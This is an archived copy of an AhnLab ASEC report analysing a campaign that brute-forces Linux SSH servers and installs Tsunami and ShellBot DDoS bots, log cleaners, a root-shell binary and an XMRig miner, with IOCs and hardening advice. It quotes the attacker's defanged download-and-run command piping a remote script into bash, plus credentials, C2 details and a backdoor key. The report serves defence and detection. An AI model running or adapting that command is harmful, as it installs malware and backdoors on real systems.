{
	"id": "5358e8fd-706e-4cf1-bca8-504171966ec0",
	"created_at": "2026-04-06T00:18:21.701813Z",
	"updated_at": "2026-04-10T03:20:53.286477Z",
	"deleted_at": null,
	"sha1_hash": "c0643ae2d600552b296f7a535d38e56fdca4e0fd",
	"title": "Tsunami DDoS Malware Distributed to Linux SSH Servers - ASEC",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 3621988,
	"plain_text": "Tsunami DDoS Malware Distributed to Linux SSH Servers - ASEC\r\nBy ATCP\r\nPublished: 2023-06-11 · Archived: 2026-04-05 16:05:52 UTC\r\nAhnLab Security Emergency response Center (ASEC) has recently discovered an attack campaign that consists of the\r\nTsunami DDoS Bot being installed on inadequately managed Linux SSH servers. Not only did the threat actor install\r\nTsunami, but they also installed various other malware such as ShellBot, XMRig CoinMiner, and Log Cleaner.\r\nWhen looking at the attack cases against poorly managed Linux SSH servers, most of them involve the installation of DDoS\r\nbots or CoinMiners. DDoS bot has been covered here in the ASEC Blog before through the attack cases where ShellBot [1]\r\nand ChinaZ DDoS Bot [2] were installed. The installation of XMRig CoinMiner was covered in tandem with the SHC\r\nmalware [3] and the KONO DIO DA attack campaign[4].\r\nTsunami is a DDoS bot that is also known as Kaiten. It is one of the several malware strains that have been consistently\r\ndistributed together with Mirai and Gafgyt when targeting IoT devices that are generally vulnerable. While they all share the\r\ncommon ground of being DDoS bots, Tsunami stands out from the others in that it operates as an IRC bot, utilizing IRC to\r\ncommunicate with the threat actor.\r\nThe source code of Tsunami is publicly available so it is used by a multitude of threat actors. Among its various uses, it is\r\nmostly used in attacks against IoT devices. Of course, it is also consistently used to target Linux servers. Additionally,\r\nsimilar to the case where XMRig CoinMiner was distributed to a public Docker container with Tsunami, another case was\r\nconfirmed where they were also distributed to a cloud environment. 
In addition, including malware inside unofficially\r\ndistributed Docker containers is one of its primary attack vectors.\r\nThis post will cover a case where a threat actor managed to log in to poorly managed SSH servers after carrying out\r\ndictionary attacks, which was then followed by installing DDoS Bots and XMRig CoinMiner.\r\n1. Dictionary Attack Against Linux SSH Servers\r\nPoorly managed services are one of the prime examples of attack vectors used to target server environments such as Linux\r\nservers. The Secure Shell (SSH) service is installed in most Linux server environments, can easily be used for attacks, and is\r\nprone to poor management. SSH allows administrators to log in remotely and control the system, but they must log into the\r\nuser account registered to the system to do so.\r\nIf simple account credentials (ID/PW) are used in a Linux system, a threat actor can log into the system through brute force\r\nor a dictionary attack, allowing them to execute malicious commands. When Linux SSH servers that are poorly managed are\r\nattacked, the main attack method involves searching externally exposed SSH servers through port scanning and using the\r\nknown account credentials to perform dictionary attacks and log in. Malware is then downloaded afterward.\r\nThe following table is a segment of the list from the aforementioned attack campaign, displaying the addresses of the attackers\r\nalong with the IDs and passwords they used.\r\nID Password Attacker\r\nadmin qwe123Q# 124.160.40[.]48\r\nsxit sxit 124.160.40[.]94\r\nroot abcdefghi 124.160.40[.]94\r\nroot 123@abc 124.160.40[.]94\r\nweblogic 123 124.160.40[.]94\r\nrpcuser rpcuser 124.160.40[.]94\r\ntest p@ssw0rd 124.160.40[.]94\r\nnologin nologin 124.160.40[.]94\r\nHadoop p@ssw0rd 124.160.40[.]94\r\nhxw test123 124.160.40[.]94\r\nbacklog backlog 124.160.40[.]94\r\ndell 123 124.160.40[.]94\r\nTable 1. 
Attack locations and account credentials used in the attack campaign\r\nhttps://asec.ahnlab.com/en/54647/\r\nPage 1 of 9\n\n2. Attack Flow\r\nAfter successfully logging in, the threat actor executes a command like the one below to download and run various malware.\r\n# nvidia-smi --list-gpus | grep 0 | cut -f2 -d: | uniq -c;nproc;ip a | grep glo;uname -a;cd /tmp;wget -O -\r\nddoser[.]org/key|bash;cd /var/tmp;wget ddoser[.]org/a;chmod +x a;./a;wget ddoser[.]org/logo;perl logo\r\nirc.undernet.org 6667 -bash;rm -rf logo;wget ddoser[.]org/top;tar -zxvf top;rm -rf top;cd lib32;./go \u003e /dev/null\r\n2\u003e\u00261 \u0026\r\nAmong the malware that are installed, the “key” file is a downloader-type Bash script that installs additional malware. In\r\naddition to being a downloader, it also performs various preliminary tasks to take control of infected systems, which\r\nincludes installing a backdoor SSH account.\r\nWhen logging into a remote SSH server, it is possible to log in without an ID and PW by generating public and private keys.\r\nTo accomplish this, a user can generate public and private SSH keys and then register their public key to their desired server.\r\nAfterward, the private key on the client can be used to log in. The threat actor uses this command to write the\r\nfollowing public key in the “authorized_keys” file. By doing so, the threat actor is later able to use the private\r\nkey corresponding to this public key, allowing them to log in to the infected system.\r\nssh-rsa\r\nAAAAB3NzaC1yc2EAAAADAQABAAABAQCzml2PeIHOUG+78TIk0lQcR5JC/mlDElDtplEfq8KDiJFwD8z9Shhk2kG0pwzw9uUr7R24h8lnh9D\r\nThe malware that are installed through the executed command and downloader Bash script after login are summarized\r\nbelow. 
An analysis of each type of malware is also provided.\r\nDownload URL Malware\r\nddoser[.]org/key Downloader Bash\r\nddoser[.]org/logo ShellBot DDoS Bot\r\nddoser[.]org/siwen/bot ShellBot DDoS Bot\r\nddoser[.]org/siwen/a Tsunami DDoS Bot\r\nddoser[.]org/siwen/cls MIG Logcleaner v2.0\r\nddoser[.]org/siwen/clean 0x333shadow Log Cleaner\r\nddoser[.]org/siwen/ping6 Privilege escalation malware\r\nddoser[.]org/top XMRig CoinMiner (compressed file)\r\nTable 2. List of malware used in the attack\r\n3. Malware Analysis\r\n3.1. Tsunami\r\nA DDoS bot malware also known as Kaiten, Tsunami is used by various threat actors since its source code is publicly\r\navailable. Threat actors often modify the source code of the existing Kaiten to add more features, and the Tsunami used in\r\nthis attack is a variant of Kaiten called Ziggy. When comparing the explanations shown in the actual help command, they are\r\nidentical to the source code.\r\nBy looking at the configuration data included inside the binary of Tsunami, you can see that the threat actor attached the\r\nname “ddoser – v0.69” to it.\r\nA characteristic of Tsunami is that it uses an IRC protocol to communicate with C\u0026C servers. IRC is a real-time Internet\r\nchat protocol developed in 1988. Users log onto certain channels of certain IRC servers and chat with other users who have\r\nlogged onto the same channel in real-time. An IRC bot is a bot malware that abuses this IRC service to communicate with C\u0026C\r\nservers.\r\nThe IRC bot installed on the infected system accesses an IRC server’s channel designated by the threat actor according to\r\nthe IRC protocol, after which it either transmits the stolen information to the specified channel or when the attacker enters a\r\nparticular string, it receives this as a command and performs the corresponding malicious behavior. 
IRC has seen consistent\r\nuse from malware as it uses a preexisting IRC protocol and IRC server without having to develop a separate C\u0026C server and\r\nprotocol.\r\nWhen Tsunami is executed, it writes its own path in the “/etc/rc.local” file, making it so that it runs even after reboots.\r\nAfterward, it attempts to change the name of the process that is currently running to “[kworker/0:0]”. This gives it the same\r\nname as a normal process, making it difficult for users to notice. Once it reaches this point, Tsunami connects to the IRC\r\nserver, joins a channel, and waits for the threat actor’s commands.\r\nAdditionally, information such as the C\u0026C address and the channel password are encrypted and saved. Tsunami decrypts\r\nand retrieves the strings it needs during its execution. There are two C\u0026C server addresses, and Tsunami randomly selects\r\none of them to attempt a connection.\r\nThe following table details the various pieces of configuration data that are included with the C\u0026C server address. Note that\r\na random string is used as the nickname when joining an IRC server.\r\nConfiguration Data\r\nVersion ddoser – v0.69\r\nArchitecture x86_64\r\nName to disguise itself as [kworker/0:0]\r\nC\u0026C server (IRC)\r\nircx.us[.]to:53\r\nircxx.us[.]to:53\r\nIRC channel name ddoser\r\nIRC channel password (enc_passwd) bakla\r\nActivation/deactivation password null\r\nDefault HTTP server address for downloading localhost (deactivated)\r\nTable 3. Tsunami configuration data\r\nTsunami supports various DDoS attack commands along with basic IRC commands. 
Furthermore, it also provides features\r\nto control infected systems such as system information collection, command execution, and reverse shell.\r\nType Command Feature\r\nRemote\r\ncontrol\r\nSYSINFO\r\nSystem information\r\n(CPU, memory, network information, OS version,\r\nlogin user, Uptime)\r\n  GET Download file from external source\r\n  UPDATE Update bot\r\n  ENABLE / DISABLE Activate/deactivate bot (password required)\r\n  SH / ISH / SHD / BASH Execute shell command\r\n  RSHELL Reverse shell\r\n  KILL Terminate\r\nDDoS attack\r\nPAN / SYNFLOOD /\r\nNSSYNFLOOD\r\nSYN Flood\r\n  ACKFLOOD / NSACKFLOOD Ack Flood\r\nRANDOMFLOOD Syn/Ack Flooder\r\n  UDP UDP Flood\r\n  UNKNOWN Non-spoof UDP Flood\r\n  SPOOFS IP spoofing during DDoS attack\r\n  GETSPOOFS Return IP spoofing used during DDoS attack\r\n  KILLALL Terminate attack\r\nTable 4. List of key commands that are supported\r\n3.2. ShellBot\r\nThe “bot” and “logo” that are installed through the initial execution command and Bash downloader “key” are actually the\r\nsame ShellBot malware. ShellBot is a DDoS bot developed in Perl and it is also an IRC Bot that utilizes the IRC protocol\r\nlike Tsunami. Previously on the ASEC Blog, the ShellBot malware that were used to attack poorly managed Linux SSH\r\nservers had been categorized and analyzed. [5] The ShellBot strains used in this attack are not identical to any of the ones\r\ncovered in that previous post, but they are undeniably variants of ShellBot.\r\nThe ShellBots used in this attack all operate by receiving the C\u0026C server address and port number as arguments. The\r\nfollowing is a list of C\u0026C server addresses used in the attack.\r\nShellBot IRC Server Address\r\nlogo irc.undernet[.]org:6667\r\nbot ircx.us[.]to:6667\r\nbot irc.dal[.]net:6667\r\nbot irc.undernet[.]org:6667\r\nbot ircx.us[.]to:20\r\nTable 5. 
List of IRC server addresses used by ShellBot\r\nSimilar to other ShellBots, a nickname is selected from a list they are holding. In order to issue commands in the channel,\r\nthe nickname and host address of the threat actor who entered the channel disguised as the admin are verified. The IRC\r\nchannel uses the same name as the Tsunami malware, “#ddoser”.\r\nShellBot Configuration Data\r\nBoth Channel name ddoser, #packeter\r\nBoth Channel password s6x\r\nBoth Nickname (multiple)\r\nbot\r\nChannel admin’s\r\nnickname\r\n“Janroe”,”thief”,”eXploiter”,”Bolero”,”Janr0e”,”nobody”\r\nlogo\r\nChannel admin’s\r\nnickname\r\n“Janroe”,”thief”,”eXploiter”,”emperor”,”nobody”\r\nbot Channel admin’s host\r\n“exploiter.users.undernet[.]org”,\r\n“Janroe.users.undernet[.]org”,\r\n“ddoser.users.undernet[.]org”,\r\n“ddoser[.]de”,”ddoser[.]org”\r\nlogo Channel admin’s host\r\n“exploiter.users.undernet[.]org”,\r\n“theft.users.undernet[.]org”,\r\n“Janroe.users.undernet[.]org”,\r\n“ddoser[.]org”,”ddoser[.]de”\r\nTable 6. Configuration data of ShellBot\r\nShellBot supports port scanning, basic DDoS attacks, and reverse shells.\r\nCommand Feature\r\nportscan Port scan\r\nudpflood UDP Flood\r\ntcpflood TCP Flood\r\nhttpflood HTTP Flood\r\nback Reverse shell\r\nTable 7. List of key commands that are supported\r\n3.3. Log Cleaner\r\nLog Cleaner malware exists among the malware that are installed by the threat actor. In Linux server environments, there are\r\nvarious types of log files that record the activities of users or threat actors. Log Cleaner is a tool that enables the deletion or\r\nmodification of specific logs within these log files. It is believed that the threat actor installed Log Cleaner with the intention\r\nof hindering any subsequent analysis of their breach.\r\nAmong the files that are installed, “cls” is “MIG Logcleaner v2.0” and “clean” is “0x333shadow Log Cleaner”. 
For starters,\r\nMIG LogCleaner is capable of receiving various options as arguments, like the ones shown below, to delete desired logs\r\nfrom Linux, Unix, and BSD systems.\r\nArgument Description\r\n[-u \u003cuser\u003e] User name\r\n[-n \u003cn\u003e] Number of entries to delete. The default is 1. 0 will select all.\r\n[-D \u003cdir\u003e] Base log directory (Default is /var/log/)\r\n[-a \u003cstring1\u003e] IP string to remove from files within the log directory\r\n[-b \u003cstring2\u003e] Domain string to remove from files within the log directory\r\n[-R] Replace Mode\r\n[-A] Add Mode\r\n[-U \u003cuser\u003e] User name to change or add in Replace or Add Mode\r\n[-H \u003chost\u003e] Host name to change or add in Replace or Add Mode\r\n[-I \u003cn\u003e] Login time to change or add in Replace or Add Mode\r\n[-O \u003cn\u003e] Logout time to change or add in Replace or Add Mode\r\n[-T \u003ctty\u003e] tty to add in Add Mode\r\n[-d] Run in debug mode\r\nTable 8. How to use MIG LogCleaner\r\nThe log files related to users logged into a Linux environment are as follows, and threat actors can manipulate these log files\r\nto either delete or change login records.\r\n  Path Details Command\r\nutmp\r\n/var/run/utmp (Linux)\r\n/var/adm/utmpx (Solaris)\r\nInformation of currently logged-in user w, who, finger\r\nwtmp\r\n/var/log/wtmp (Linux)\r\n/var/adm/wtmpx (Solaris)\r\nLogin/logout information last\r\nlast log\r\n/var/log/lastlog (Linux)\r\n/var/adm/lastlog (Solaris)\r\nInformation of last successful login\r\nlastlog (Linux)\r\nfinger (Solaris)\r\nTable 9. Log types in the Linux environment\r\nVarious log files can be modified through MIG LogCleaner. For example, it can delete lines that have a specific string,\r\nreplace the string, or add a new string. 
Furthermore, a command like the one below can be used to add a login record.\r\nThe “0x333shadow Log Cleaner” which is installed together has identical features.\r\n3.4. Privilege Escalation Malware\r\nThe “ping6” file is an ELF malware with the following simple structure. The setuid() and setgid() functions are used to set\r\nthe user ID and group ID as the root account before executing the shell.\r\nThe “key” Bash script sets the setuid after installing “ping6”. If a successful login is made with the root account and the\r\n“key” Bash script is installed with the account, the threat actor can subsequently utilize “ping6” to gain access to a shell with\r\nroot privileges.\r\n3.5. XMRig CoinMiner\r\nIn this particular attack campaign, a CoinMiner is also installed alongside the DDoS bots. The command that is executed\r\nafter logging in through a dictionary attack downloads and decompresses a compressed file called tar. The resulting “go” file\r\nis then executed. As a simple Bash script, “go” executes the “televizor” file which is located in the same path. “televizor” is\r\nalso a Bash script and it executes the “telecomanda” Bash script. This ultimately leads to the XMRig CoinMiner “cnrig”\r\nbeing executed.\r\nThe configuration data required for coin mining is held by the “config.json” file which exists in the same path.\r\nMining Pool : monerohash[.]com:80\r\nuser :\r\n“46WyHX3L85SAp3oKu1im7EgaVGBsWYhf7KxrebESVE6QHA5vJRab6wF1gsVkYwJfnNV2KYHU1Xq2A9XUYmWhvzPf2E6Nvse”\r\npass : “nobody”\r\n4. Conclusion\r\nAttack campaigns on poorly managed Linux SSH servers have been occurring persistently for quite some time. The threat\r\nactor installed XMRig CoinMiner alongside DDoS bots like Tsunami and ShellBot on infected systems.\r\nIn environments where the CoinMiner is installed, the infected system’s resources are used to mine Monero coins for the\r\nthreat actor. 
Infected systems can also be used for DDoS attacks due to the DDoS bots that are also installed, allowing\r\nadditional malicious commands to be executed. Even if these malware are deleted, the threat actor can regain access to the\r\nsystem using the SSH backdoor account they had also installed. This allows them to perform various malicious behaviors\r\nlike installing different malware and stealing information from the system.\r\nBecause of this, administrators should use passwords that are difficult to guess for their accounts and change them\r\nperiodically to protect the Linux server from brute force attacks and dictionary attacks and update to the latest patch to\r\nprevent vulnerability attacks. They should also use security programs such as firewalls for servers accessible from outside to\r\nrestrict access by attackers. Finally, caution must be practiced by updating V3 to the latest version to block malware\r\ninfection in advance.\r\nFile Detection\r\n– Linux/CoinMiner.Gen2 (2019.07.31.08)\r\n– Linux/Tsunami.Gen (2016.08.24.00)\r\n– Shellbot/Perl.Generic.S1118 (2020.02.19.07)\r\n– Downloader/Shell.Agent.SC189601 (2023.06.12.02)\r\n– HackTool/Linux.LogWiper.22272 (2023.06.12.02)\r\n– HackTool/Linux.LogWiper.28728 (2023.06.12.02)\r\n– Trojan/Linux.Agent.8456 (2023.06.12.02)\r\n– Trojan/Shell.Runner (2023.06.12.02)\r\n– CoinMiner/Text.Config (2023.06.12.02)\r\nMD5\r\n0014403121eeaebaeede796e4b6e5dbe\r\n125951260a0cb473ce9b7acc406e83e1\r\n2cd8157ba0171ca5d8b50499f4440d96\r\n32eb33cdfa763b012cd8bcad97d560f0\r\n421ffee8a223210b2c8f2384ee6a88b4\r\nAdditional IOCs are available on AhnLab TIP.\r\nURL\r\nhttp[:]//ddoser[.]org/a\r\nhttp[:]//ddoser[.]org/key\r\nhttp[:]//ddoser[.]org/logo\r\nhttp[:]//ddoser[.]org/siwen/clean\r\nhttp[:]//ddoser[.]org/siwen/cls\r\nAdditional IOCs are available on AhnLab TIP.\r\nGain access to related IOCs and detailed analysis by subscribing to AhnLab TIP. 
For subscription details, click the banner\r\nbelow.\r\nSource: https://asec.ahnlab.com/en/54647/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://asec.ahnlab.com/en/54647/"
	],
	"report_names": [
		"54647"
	],
	"threat_actors": [],
	"ts_created_at": 1775434701,
	"ts_updated_at": 1775791253,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/c0643ae2d600552b296f7a535d38e56fdca4e0fd.pdf",
		"text": "https://archive.orkl.eu/c0643ae2d600552b296f7a535d38e56fdca4e0fd.txt",
		"img": "https://archive.orkl.eu/c0643ae2d600552b296f7a535d38e56fdca4e0fd.jpg"
	}
}